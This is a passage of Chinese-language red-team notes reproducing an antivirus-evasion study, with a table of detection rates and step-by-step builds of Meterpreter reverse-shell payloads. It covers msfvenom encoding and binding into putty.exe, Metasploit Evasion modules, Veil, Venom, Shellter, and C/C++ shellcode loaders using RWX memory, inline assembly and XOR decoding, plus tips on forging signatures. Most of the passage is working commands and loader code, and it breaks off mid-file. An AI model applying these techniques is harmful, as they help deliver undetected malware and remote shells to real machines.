添加资源:使用ResHacker将正常软件的资源加入到恶意软件,例如图片、版本信息、对话框等 +- 替换资源:使用ResHacker替换无用的资源,例如版本等 +- 添加签名:使用签名伪造工具,将正常软件的签名信息添加到恶意软件 + +# 免杀技术研究 + +## Bypass一览表(2020年) + +![](./images/202205261702163.png) + +![](./images/202205261701678.png) + +## Bypass一览表(2022年) + +VirusTotal对应杀软及名称: + +- 卡巴:Kaspersky +- 微软:Microsoft +- 瑞星:Rising +- 金山:Kingsoft +- 江民:Jiangmin +- 趋势:TrendMicro + +| 序号 | 免杀方法 | 2020年VT | 2022年VT | 360 | QQ | 火绒 | 卡巴 | McAfee | 微软 | Symantec | 瑞星 | 金山 | 江民 | 趋势 | +| ---- | ------------------- | -------- | -------- | ---- | ---- | ---- | ---- | ------ | ---- | -------- | ---- | ---- | ---- | ---- | +| 1 | 未免杀处理 | 53/69 | 51/69 | | | | | | | | | √ | √ | | +| 2 | msf自编码 | 51/69 | 48/67 | | | | | | | | | √ | √ | | +| 3 | msf自捆绑 | 39/69 | 15/69 | | √ | √ | √ | | √ | √ | | √ | √ | √ | +| 4 | msf捆绑+编码 | 35/68 | 16/69 | | √ | √ | √ | | √ | √ | | √ | √ | √ | +| 5 | msf多重编码 | 45/70 | 28/67 | | √ | √ | | √ | √ | √ | | √ | √ | √ | +| 6 | Evasion模块exe | 42/71 | 43/69 | | √ | | | | | | | √ | √ | √ | +| 7 | Evasion模块hta | 14/59 | (None) | | | | | | | | | | | | +| 8 | Evasion模块csc | 12/71 | 33/69 | | √ | | √ | | | √ | | √ | √ | √ | +| 9 | Veil原生exe | 44/71 | 44/69 | | | | | | | | | √ | | √ | +| 10 | Veil+gcc编译 | 23/71 | 11/69 | | √ | | √ | √ | √ | √ | √ | √ | √ | √ | +| 11 | Venom生成exe | 19/71 | 35/68 | | √ | | | | √ | | | √ | | √ | +| 12 | Venom生成dll | 11/71 | (None) | | | | | | | | | | | | +| 13 | Shellter生成exe | 7/69 | 12/65 | | √ | | √ | √ | | √ | √ | √ | √ | √ | +| 14 | msf生成exe | - | 51/69 | | | | | | | | | √ | √ | | +| 15 | C/C++2:动态内存 | 24/71 | 36/69 | | √ | | | | | | | √ | | √ | +| 16 | C/C++3:嵌入汇编 | 12/71 | 36/69 | | √ | | | | | | | √ | | √ | +| 17 | C/C++4:强制转换 | 9/70 | 34/68 | | √ | | | | | | | √ | | √ | +| 18 | C/C++5:汇编花指令 | 12/69 | 37/69 | √ | √ | | | | | | | √ | | √ | +| 19 | C/C++6:XOR加密 | 15/71 | 21/69 | | √ | | | | √ | | | √ | | √ | +| 20 | C/C++7:base64加密1 | 28/69 | 21/68 | √ | √ | | √ | | √ | | | √ | √ | √ | +| 21 | C/C++8:base64加密2 | 28/69 | 17/67 | √ | √ | | √ | | √ | | | √ | √ | √ | + +## 复现环境(2022年) + +时间:2022.05 + +攻击机:192.168.174.128 + +免杀方法: + +- 此处仅介绍msf、Evasion、Veil、Venom、C/C++ Shellcode,其余方法参见原po:https://github.com/TideSec/BypassAntiVirus + +原po各杀软版本: + +- 360杀毒版本5.0.0.8160(2019.12.12) +- 火绒版本5.0.33.13(2019.12.12) +- 360安全卫士12.0.0.2001(2019.12.17) + +本文各杀软版本: + +- 火绒版本5.0.68.2(2022.05.26) +- 360安全卫士13.0.0.2003(2022.05.26) + +测试平台: + +- Virustotal,以下简称VT。VT查杀率代表静态查杀能力。 + +【注意】 + +- 如果是自己做免杀,建议测试机不要连互联网,更不要上传到virustotal.com类似的平台上。 + +- 不要上传! +- 不要上传! +- 不要上传! +- 上传一次以后,你自己辛辛苦苦写的免杀可能就不再免杀了。 + +## Metasploit自带免杀 + +Payload均使用MSF的windows/meterperter/reverse_tcp模块生成。 + +攻击机MSF监听6666端口: + +``` +msf6 > use exploits/multi/handler +msf6 exploit(multi/handler) > set LHOST 192.168.174.128 +msf6 exploit(multi/handler) > set LPORT 6666 +msf6 exploit(multi/handler) > run +``` + +### 原生态payload(VT查杀率51/69) + +MSF生成原始payload: + +``` +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=6666 -f exe -o /mnt/hgfs/Share/payload1.exe +``` + +![image-20220526190423066](./images/202205261904148.png) + +360和火绒都能查杀。 + +在virustotal.com上查杀率为51/69(原po为53/69)。 + +360: + +![image-20220526190107987](./images/202205261901055.png) + +火绒: + +![image-20220526190513816](./images/202205261905876.png) + +VT查杀成功: + +![image-20220526190921570](./images/202205261909679.png) + +VT查杀失败: + +![image-20220526190959477](./images/202205261909529.png) + +### msf自编码免杀(VT查杀率48/67) + +使用`msfvenom --list encoders`可查看所有编码器。 + +评级最高的两个encoder为cmd/powershell_base64和x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器。 + +使用`x86/shikata_ga_nai`生成payload,参数`-i`为编码次数,使用`-b`参数去掉payload中的空字符: + +``` +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=6666 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o /mnt/hgfs/Share/payload2.exe +``` + +![image-20220526191328018](./images/202205261913186.png) + +由于shikata_ga_nai编码技术是多态的,也就是说每次生成的payload文件都不一样,有时生成的文件会被查杀,有时却不会。当然这个也和编码次数有一定关系,编码次数好像超过70次就经常生成出错,但是编码次数多并不代表免杀能力强。 + +360和火绒都能查杀。 + +在virustotal.com上查杀率为48/67(原po为51/69)。 + +360: + +![image-20220526191412121](./images/202205261914178.png) + +火绒: + +![image-20220526191549429](./images/202205261915497.png) + +VT查杀成功: + +![image-20220526191847382](./images/202205261918483.png) + +VT查杀失败: + +![image-20220526191857605](./images/202205261918665.png) + +### msf自捆绑免杀(VT查杀率15/69) + +在生成payload时可以使用捆绑功能,使用msfvenom的`-x`参数可以指定一个自定义的可执行文件作为模板,并将payload嵌入其中,`-x`后面跟对应文件路径就可以。 + +这里使用一个正规的`putty.exe`作为被捆绑测试软件。 + +生成payload命令如下: + +``` +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=6666 -x putty.exe -f exe -o /mnt/hgfs/Share/payload3.exe +``` + +![image-20220526192124189](./images/202205261921270.png) + +生成的两个文件对比,大小完全一样。能否免杀也和被捆绑exe有一定关系,可以选微软的一些工具作为模板exe程序。 + +![image-20220526192251559](./images/202205261922615.png) + +360能查杀,火绒不能查杀。但是识别时间比前两种方法久一些(原po火绒也能查杀)。 + +在virustotal.com上查杀率为15/69(原po为39/69)。 + +360: + +![image-20220526192548112](./images/202205261925172.png) + +VT: + +![image-20220526193243216](./images/202205261932310.png) + + + +### msf自捆绑+编码(VT查杀率16/69) + +将上面的编码和捆绑两种方法结合一下进行尝试: + +``` +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=6666 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o /mnt/hgfs/Share/payload4.exe +``` + +![image-20220526193359812](./images/202205261933974.png) + +与上一种方法对比,大小完全一样。 + +![image-20220526193552798](./images/202205261935858.png) + +可修改-i编码次数,编码次数越多,生成的payload越可能免杀,经测试,编码5次和6次可免杀360。 + +360能查杀,火绒不能查杀。但是识别时间比前两种方法久一些(原po火绒动态静态均能查杀,而360不会报毒)。 + +在virustotal.com上查杀率为16/69(原po为35/69)。 + +360: + +![image-20220526194032466](./images/202205261940527.png) + +VT: + +![image-20220526193813109](./images/202205261938216.png) + +### msfvenom多重编码(VT查杀率28/67) + +msfvenom的encoder编码器可以对payload进行一定程度免杀,同时还可以使用msfvenom多重编码功能,通过管道,让msfvenom用不同编码器反复编码进行混淆。 + +如下命令,使用管道让`msfvenom`对攻击载荷多重编码,先用`shikata_ga_nai`编码20次,接着来10次的`alpha_upper`编码,再来10次的`countdown`编码,最后才生成以`putty.exe`为模板的可执行文件。 + +``` +msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.174.128 LPORT=6666 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o /mnt/hgfs/Share/payload5.exe +``` + +如果报错`Error: You must select an arch for a custom payload`,则添加参数: + +``` +-a x86 --platform windows +``` + +![image-20220526194938055](./images/202205261949206.png) + +还有更多重编码姿势: + +``` +msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.74.133 LPORT=5110 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > payload6.exe +``` + +经过测试,发现使用的编码类型越多,免杀率可能会降低,猜测是因为各种编码引入了更多的特征码。同时生成的payload也很可能无法正常执行,这个也和被捆绑程序有一定关联。 + +360可以查杀,火绒不能查杀。 + +在virustotal.com上查杀率为28/67(原po为45/70),Bypass了McAfee。 + +360: + +![image-20220526195103114](./images/202205261951182.png) + +VT: + +![image-20220526195652390](./images/202205261956521.png) + + + +## Metasploit Evasion免杀 + +2019年1月,metasploit升级到了5.0,引入了一个新的模块叫Evasion模块,官方宣称这个模块可以创建反杀毒软件的木马。evasion有以下几个模块,可以使用`show evasion`进行查看。 + +msf6 evasion模块: + +![image-20220527084747663](./images/202205270847820.png) + +### 生成exe(VT查杀率43/69) + +使用`use windows/windows_defender_exe`进行生成payload + +``` +msf6 > use windows/windows_defender_exe +msf6 evasion(windows/windows_defender_exe) > set filename payload.exe +msf6 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp +msf6 evasion(windows/windows_defender_exe) > set LHOST 192.168.174.128 +msf6 evasion(windows/windows_defender_exe) > set LPORT 6666 +msf6 evasion(windows/windows_defender_exe) > run +``` + +![image-20220527085549361](./images/202205270855472.png) + +不打开杀软的情况下,可正常上线: + +``` +handler -H 192.168.174.128 -P 6666 -p windows/meterpreter/reverse_tcp +``` + +打开杀软,360和火绒都能查杀。 + +在virustotal.com上查杀率为43/69(原po为42/71)。 + +360: + +![image-20220527085842405](./images/202205270858477.png) + +火绒: + +![image-20220527085747182](./images/202205270857265.png) + +VT: + +![image-20220527090002712](./images/202205270900839.png) + +### 生成hta(VT查杀率14/59) + +用另外一个evasion模块`windows/windows_defender_js_hta`生成一下,360同样被杀。 + +``` +msf6 > use windows/windows_defender_js_hta +msf6 evasion(windows/windows_defender_exe) > set filename payload1.exe +msf6 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp +msf6 evasion(windows/windows_defender_exe) > set LHOST 192.168.174.128 +msf6 evasion(windows/windows_defender_exe) > set LPORT 6666 +msf6 evasion(windows/windows_defender_exe) > run +``` + +但是火绒静态+行为查杀都没发现问题,可正常上线。 + +在virustotal.com上查杀率为14/59。不过在线查毒时显示360也没查出来,但本地测试时却是能查出来的,所以在线查杀还是不太精准的。 + +复现时该模块生成的可执行无法运行。 + +### 生成install_util(VT查杀率33/69) + +evasion还提供了其他几个模块,比如`windows/applocker_evasion_install_util` + +创建payload + +``` +msf6 > use windows/applocker_evasion_install_util +msf6 evasion(windows/applocker_evasion_install_util) > set payload windows/meterpreter/reverse_tcp +msf6 evasion(windows/applocker_evasion_install_util) > set lhost 192.168.174.128 +msf6 evasion(windows/applocker_evasion_install_util) > set lport 6666 +msf6 evasion(windows/applocker_evasion_install_util) > run + +[+] install_util.txt stored at /Users/xysoul/.msf4/local/install_util.txt +[*] Copy install_util.txt to the target +[*] Compile using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\csc.exe /out:install_util.exe install_util.txt +[*] Execute using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe +``` + +根据说明,需要使用csc.exe进行编译一下,然后用`InstallUtil.exe`加载文件。 + +csc.exe是微软.NET Framework 中的C#语言编译器,本机安装了.net后就可以找到该文件。用vs2017里的csc.exe进行编译,生成install_util.exe。 + +``` +> C:\Windows\Microsoft.Net\Framework\v2.0.50727\csc.exe /out:install_util.exe install_util.txt +``` + +![image-20220527092742869](./images/202205270927923.png) + +直接执行`install_util.exe`,无法上线,并且360查杀报毒。 + +根据说明,需要使用`InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe`来加载,才能成功上线。 + +``` +> C:\Windows\Microsoft.Net\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe +``` + +注意的是,如果生成的是32位的payload,就要用32位的.net下的InstallUtil来加载,否则文件会无法执行。 + +![image-20220527093115067](./images/202205270931141.png) + +360和火绒都能查杀(原po静态查杀都没有问题,执行时360行为查杀会报毒)。 + +在virustotal.com上查杀率为33/69(原po为12/71)。 + +360: + +![image-20220527093207774](./images/202205270932856.png) + + + +火绒: + +![image-20220527093508879](./images/202205270935961.png) + +VT: + +![image-20220527093615742](./images/202205270936872.png) + +## Veil免杀 + +Veil、Venom和Shellter是三大老牌免杀工具。 + +Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避了常见防病毒产品的检测。 + +### 安装Veil + +推荐Docker方式进行安装。镜像地址: + +``` +https://hub.docker.com/r/mattiasohlsson/veil/ +``` + +拉取veil镜像: + +``` +docker pull mattiasohlsson/veil +``` + +拉取成功后,执行: + +``` +docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil +``` + +`-v /tmp/veil-output:/var/lib/veil/output:Z`是将宿主机的`/tmp/veil-output`目录映射到docker里面,这样veil生成的payload可以直接在宿主机里使用。 + +之后再进入镜像可以在启动镜像后使用下面命令: + +``` +docker exec -it /bin/bash +``` + +执行`veil`命令可启动,版本为3.1.1。 + +veil有两个免杀的工具,Evasion和Ordnance。Ordnance可生成在Veil-Evasion中使用的shellcode,Evasion是用做文件免杀。一般选择Evasion。 + +``` +Veil>: use 1 #选择Evasion功能 +Veil/Evasion>: list #查看payload列表 +``` + +使用`list`可以看到到41种stager。 + +![image-20220527094613602](./images/202205270946813.png) + +推荐使用以go和ruby语言encode的编码方式。像python这类的与用户有较高的交互就容易被查杀。 + +veil原理可以参考:https://xz.aliyun.com/t/4191 + +### 使用veil直接生成exe(VT查杀率44/69) + +veil可以直接生成支持msf的payload,我们先试一下看看效果。 + +使用go语言生成msf的payload + +``` +Veil/Evasion>: use 16 +``` + +设置好msf的监听主机和端口: + +``` +[go/meterpreter/rev_tcp>>]: set lhost 192.168.174.128 +[go/meterpreter/rev_tcp>>]: set lport 6666 +[go/meterpreter/rev_tcp>>]: generate +``` + +![image-20220527095925448](./images/202205270959676.png) + +设定好生成的payload的名称,例如payload1: + +![image-20220527094916300](./images/202205270950182.png) + +一系列编码编译之后,就生成payload了: + +![image-20220527095021088](./images/202205270950223.png) + +因为之前已经做过Docker目录映射,所以在宿主机的`/tmp/veil-output/compiled/`目录可直接看到生成的exe文件。 + +在msf中监听: + +``` +msf6 > use exploit/multi/handler +msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp +msf6 exploit(multi/handler) > set lhost 192.168.174.128 +msf6 exploit(multi/handler) > set lport 6666 +msf6 exploit(multi/handler) > exploit +``` + +在测试主机执行`payload1.exe`,360和火绒均可以查杀(原po在msf中可上线,360和火绒均不报毒)。 + +在virustotal.com上查杀率为44/69(原po为44/71)。 + +360: + +![image-20220527100249086](./images/202205271002159.png) + +火绒: + +![image-20220527101107223](./images/202205271011302.png) + +VT: + +![image-20220527101335024](./images/202205271013133.png) + +### 使用veil+mingw-w64(VT查杀率11/69) + +先用veil生成shellcode + +``` +# veil +Veil> use 1 # 选择使用 Veil-Evasion 模块 +Veil/Evasion> use 7 # 选择payload c/meterpreter/rev_tcp.py +[cs/meterpreter/rev_tcp>>] set LHOST 192.168.174.128 +[cs/meterpreter/rev_tcp>>] set LPORT 6666 +[cs/meterpreter/rev_tcp>>] generate +``` + +![image-20220527101615402](./images/202205271016580.png) + +输入生成文件名为`c_msf`: + +![image-20220527101633513](./images/202205271016611.png) + +先生成一个可以被 msf 利用的 `c_msf.c` 然后用mingw-w64 来编译。 + +mingw-w64的安装可参考:https://zhuanlan.zhihu.com/p/76613134 + +若编译报错,可以尝试指定库,生成可执行文件a.exe: + +``` +gcc c_msf.c -lws2_32 +``` + +![image-20220527112104971](./images/202205271121046.png) + +360和火绒均可以查杀(原po全程开启360卫士和杀毒以及火绒,编译、运行、上线都没有问题)。 + +在virustotal.com上查杀率为11/69(原po为23/71)。Bypass了McAfee。 + +360: + +![image-20220527112426483](./images/202205271124553.png) + +火绒: + +![image-20220527112257096](./images/202205271122178.png) + +VT: + +![image-20220527112633347](./images/202205271126466.png) + +## Venom免杀 + +Venom利用msfvenom(metasploit)生成不同的格式的shellcode,如(c | python | ruby | dll | msi | hta-psh)等,然后将生成的shellcode注入一个模板(例如:python),并使用类似gcc、mingw32或pyinstaller之类的编译器生成可执行文件。 + +Venom的一些功能还会直接调用`Veil-Evasion.py`,`unicorn.py`,`powersploit.py`等来直接创建免杀程序,避免重复造轮子。 + +### 安装Venom + +venom安装和运行必须是在图形界面下,如果是ssh终端连接到kali进行连接是不行的。venom依赖的软件比较多,所以安装出现问题是很正常的。 + +``` +Zenity | Metasploit | GCC (compiler) | Pyinstaller (compiler) +mingw32 (compiler) | pyherion.py (crypter) | wine (emulator) +PEScrambler.exe (PE obfuscator) | apache2 (webserver)| winrar (wine) +vbs-obfuscator (obfuscator) | avet (Daniel Sauder) | shellter (KyRecon) +ettercap (MitM + DNS_Spoofing) | encrypt_PolarSSL (AES crypter) +``` + +从github上拖到本地 + +``` +git clone https://github.com/r00t-3xp10it/venom.git +``` + +修改文件执行权限 + +``` +cd venom +sudo chmod -R +x *.sh +sudo chmod -R +x *.py +``` + +安装依赖库和软件 + +``` +cd aux +sudo ./setup.sh +``` + +运行venom,代码高亮有些问题,但是问题不大,还是可以用的 + +``` +sudo ./venom.sh +``` + +![image-20220527173623380](./images/202205271736471.png) + +### venom生成exe(VT查杀率35/68) + +启动venom:`sudo ./venom.sh`,然后选择windows,也就是2,然后会列出所有windows可用的20个agent。 + +![image-20220527173757520](./images/202205271737599.png) + +支持的种类还是比较全面的,shellter、avet等免杀工具都内置在里面了,而且支持很多种类似的payload格式。 + +先生成一个最简单直接的,第4个模块,通过C编译EXE程序。 + +在输入4之后,会弹出一个框让你输入ip地址,这个就是你msf监听主机的地址: + +![image-20220527173929002](./images/202205271739076.png) + +然后输入端口号之后,选择payload,选择最常规的`windows/meterperter/reverse_tcp`。 + +输入一个文件名,例如notepad。 + +![image-20220527174056207](./images/202205271740284.png) + +然后在编译和生成exe的过程中,会弹出来两个选项框,一般默认就行。 + +之后会提示已经生成,并询问你如何分发payload,直接在测试机上执行就行了,可见output文件夹已经生成了notepad.exe。 + +![image-20220527174259258](./images/202205271742310.png) + +360和火绒均可以查杀(原po360静态检测没问题,但行为检测能查杀出为病毒;火绒则静态+动态都没有检测到)。 + +在virustotal.com上查杀率为35/68(原po为19/71)。 + +360: + +![image-20220527180055539](./images/202205271800602.png) + +火绒: + +![image-20220527180138530](./images/202205271801624.png) + +VT: + +![image-20220527180452891](./images/202205271804004.png) + +### venom生成dll(VT查杀率11/70) + +选择windows之后,在agent中选择第1个,生成dll。 + +![image-20220527180740091](./images/202205271807146.png) + +后面的操作和上面那个差不多,然后就能看到生成了`notepad.dll`文件。 + +原po将文件拷贝到测试机上,命令行中执行`rundll32.exe notepad.dll,main`,可动静态免杀过360和火绒。msf正常上线。在virustotal.com上查杀率为11/71。 + +本文复现时出现问题: + +![image-20220527181539179](./images/202205271815246.png) + +## Shellter免杀 + +注意: + +- shellter目前只能注入32位的可执行文件 +- shellter需要管理员权限运行 + +### 安装Shellter + +ubuntu系统中apt安装: + +``` +apt-get update +apt-get install shellter +dpkg --add-architecture i386 && apt-get update && apt-get install wine32 +``` + +kali中不是很好用,windows中手动下载手动下载: + +官方下载站点`https://www.shellterproject.com/download/`,下载后解压,无需安装,cmd下可直接使用。 + +![image-20220527182416161](./images/202205271824223.png) + +### 生成payload(VT免杀率7/69) + +需要提前准备一个PE文件作为被注入程序。用之前选的`putty.exe`来进行测试。 + +必须使用32位PE文件,下载一个32位putty.exe: + +![image-20220527182755237](./images/202205271827287.png) + +之后程序会把`putty.exe`进行备份,因为生成的payload会自动覆盖原来的`putty.exe`。 + +但`putty-32.exe`生成报错,换了一个32位可执行文件`winrar.exe`: + +![image-20220527185054107](./images/202205271850186.png) + +选项`Enable Stealth Mode`,是否启用隐身模式,启用后免杀效果会变差,建议不启用。 + +还是选择`windows/meterpreter/reverse_tcp`作为payload + +![image-20220527185214043](./images/202205271852105.png) + +全程自动化生成,最终的生成文件会替换原来的`winrar.exe`。 + +通过对比可发现程序稍微变大了 + +在msf中使用`handler -H 192.168.174.128 -P 6666 -p windows/meterpreter/reverse_tcp`进行监听 + +360和火绒均可查杀(原po执行360和火绒均可免杀,msf正常上线)。 + +在virustotal.com上查杀率为12/65,Bypass了卡巴、瑞星(原po为7/69,卡巴、瑞星、微软三个都没bypass)。 + +360: + +![image-20220527185452045](./images/202205271854112.png) + +火绒: + +![](./images/202205271856578.png) + +VT: + +![image-20220527190242985](./images/202205271902073.png) + +## C、C++加载shellcode + +以上很多方法都是使用msfvenom生成shellcode,然后对shellcode进行混淆、编码等各种处理,最终再使用各种语言进行编译或加载。而被用到的最多的语言就是C/C++、C#和python。 + +C/C++加载shellcode手工编译的方法,一般分为两种方式: + +1. C/C++源码+shellcode直接编译,其中对shellcode的执行可以使用函数指针执行、汇编指令执行、申请动态内存等方式,且shellcode可进行一些加密混淆处理;比如免杀工具veil和Venom都是使用了类似的方法。 + +2. 使用加载器加载C/C++代码,如shellcode_launcher之类。 + +### 方法1 msf直接生成exe(VT免杀率51/69) + +这是最简单的一种加载shellcode的方法,直接使用msfvenom生成c语言的shellcode,为了提高免杀效果,使用了`shikata_ga_nai`编码器。 + +``` +msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.174.128 lport=6666 -f exe -o shellcode1.exe +``` + +![image-20220530115440059](./images/202205301154200.png) + +在msf中进行监听: + +``` +msf6 > use multi/handler +msf6 > set payload windows/meterpreter/reverse_tcp +msf6 > set LHOST 192.168.174.128 +msf6 > set LPORT 6666 +msf6 > set EnableStageEncoding true +``` + +然后执行生成的`shellcode1.exe`,msf中可正常上线: + +![image-20220530115427316](./images/202205301154538.png) + +360和火绒均可查杀,在virustotal.com上查杀率为51/69。 + +360: + +![image-20220530115531047](./images/202205301155110.png) + +火绒: + +![image-20220530115635342](./images/202205301156409.png) + +VT: + +![image-20220530115749310](./images/202205301157438.png) + +### 方法2 申请动态内存加载(VT免杀率36/69) + +下面的代码会申请一段动态内存,然后加载shellcode。 + +```c +#include +#include +#include + +#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口 + +unsigned char shellcode[] = +"shellcode"; + + +void main() + +{ + // 原po此处内存报错,已修改 + LPVOID Memory; + + Memory=VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + memcpy(Memory, shellcode, sizeof(shellcode)); + + ((void(*)())Memory)(); + +} +``` + +visual studio 2019进行编译,关闭杀软,msf中可正常上线: + +![image-20220530134959565](./images/202205301349630.png) + +打开杀软,360和火绒均可查杀(原po火绒静态和动态都可查杀,360杀毒和卫士没有反应)。 + +virustotal.com上查杀率为36/69(原po为24/71)。 + +受控机没有C环境,执行时缺少`VCRUNTIME140D.dll`和`ucrtbased.dll`,需要手动安装。 + +![image-20220530135423356](./images/202205301354403.png) + +360: + +![image-20220530135541816](./images/202205301355884.png) + +火绒: + +![image-20220530135217482](./images/202205301352552.png) + +VT: + +![image-20220530140029621](./images/202205301400718.png) + +### 方法3 嵌入汇编加载(VT免杀率36/69) + +```c +#include +#include +#pragma comment(linker, "/section:.data,RWE") +unsigned char shellcode[] =""; + +void main() +{ + + __asm + { + + mov eax, offset shellcode + jmp eax + + } +} +``` + +在vs2019中编译执行,关闭杀软,msf中可正常上线。 + +打开杀软,火绒和360均可查杀(原po火绒静态可查杀但是行为检测没报警,360杀毒和卫士没有反应,直接上线)。 + +virustotal.com上查杀率为36/69(原po为12/71)。 + +360: + +![image-20220530141332388](./images/202205301413445.png) + +火绒: + +![image-20220530141410368](./images/202205301414456.png) + +VT: + +![image-20220530141716720](./images/202205301417844.png) + +### 方法4 强制类型转换(VT免杀率34/68) + +``` +#include +#include + +unsigned char shellcode[] =""; + +void main() +{ + ((void(WINAPI*)(void))&shellcode)(); +} +``` + +打开杀软测试,360和火绒均可查杀,但360是在上线后几分钟后才检测出来的(原po静态+动态都没问题,可正常上线)。 + +virustotal.com上查杀率为34/68(原po为9/70)。 + +![image-20220530142524357](./images/202205301425472.png) + +### 方法5 汇编花指令(VT免杀率37/69) + +```c +#include +#include +#pragma comment(linker, "/section:.data,RWE") +unsigned char shellcode[] =""; + +void main() +{ + __asm + { + + mov eax, offset shellcode + _emit 0xFF + _emit 0xE0 + + } +} +``` + +打开杀软,火绒可查杀,**360不可查杀**(原po火绒静态可查杀但是行为检测没报警,360杀毒和卫士没有反应,直接上线)。 + +virustotal.com上查杀率为37/69(原po为12/69)。 + +![image-20220530143025208](./images/202205301430315.png) + +### 方法6 xor加密(VT免杀率21/69) + +需要使用一个工具`https://github.com/Arno0x/ShellcodeWrapper`,原项目为python2,在此基础上修改了一个python3版本[ShellcodeWrapper](https://github.com/Threekiii/Awesome-Redteam/tree/master/scripts/ShellcodeWrapper)。 + +先用msfvenom生成一个raw格式的shellcode + +``` +msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.174.128 lport=6666 -f raw > shellcode.raw +``` + +在`ShellcodeWrapper`文件夹中执行下面命令,其中`threekiii`为自己设置的key。 + +``` +python shellcode_encoder.py -cpp -cs -py shellcode.raw threekiii xor +``` + +生成了三个文件,一个为C++源码,也是下面要用到的,一个为C#源码,可以使用csc.exe进行加载,还有一个py文件,可直接执行也可以编译成py-exe执行。 + +![image-20220530145037208](./images/202205301450337.png) + +其中`encryptedShellcodeWrapper_xor.cpp`文件中的C++源码如下,稍作修改,删除依赖库: + +```c +/* +Author: Arno0x0x, Twitter: @Arno0x0x +*/ + +// 删除#include "stdafx.h" +#include +#include + +int main(int argc, char **argv) { + + // Encrypted shellcode and cipher key obtained from shellcode_encoder.py + char encryptedShellcode[] = ""; + char key[] = "tidesec"; + char cipherType[] = "xor"; + + // Char array to host the deciphered shellcode + char shellcode[sizeof encryptedShellcode]; + + + // XOR decoding stub using the key defined above must be the same as the encoding key + int j = 0; + for (int i = 0; i < sizeof encryptedShellcode; i++) { + if (j == sizeof key - 1) j = 0; + + shellcode[i] = encryptedShellcode[i] ^ key[j]; + j++; + } + + // Allocating memory with EXECUTE writes + void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + + // Copying deciphered shellcode into memory as a function + memcpy(exec, shellcode, sizeof shellcode); + + // Call the shellcode + ((void(*)())exec)(); +} +``` + +vs2019编译执行,关闭杀软,msf中可正常上线: + +![image-20220530145307544](./images/202205301453694.png) + +打开杀软,360和火绒均可查杀,其中360结果为“具有木马特征程序”(原po火绒静态可查杀但是行为检测没报警,360杀毒和卫士没有反应,直接上线)。 + +virustotal.com上查杀率为21/69(原po为15/71)。 + +360: + +![image-20220530145415574](./images/202205301454631.png) + +VT: + +![image-20220530145657512](./images/202205301456618.png) + +### 方法7 base64加密1(VT免杀率21/68) + +需要两个文件,`base64.c`和`base64.h` + +`base64.c`文件内容: + +```c +/* Base64 encoder/decoder. Originally Apache file ap_base64.c +*/ + +#include + +#include "base64.h" + +/* aaaack but it's fast and const should make it shared text page. */ +static const unsigned char pr2six[256] = +{ + /* ASCII table */ + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, + 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, + 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, + 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, + 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, + 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 +}; + +int Base64decode_len(const char *bufcoded) +{ + int nbytesdecoded; + register const unsigned char *bufin; + register int nprbytes; + + bufin = (const 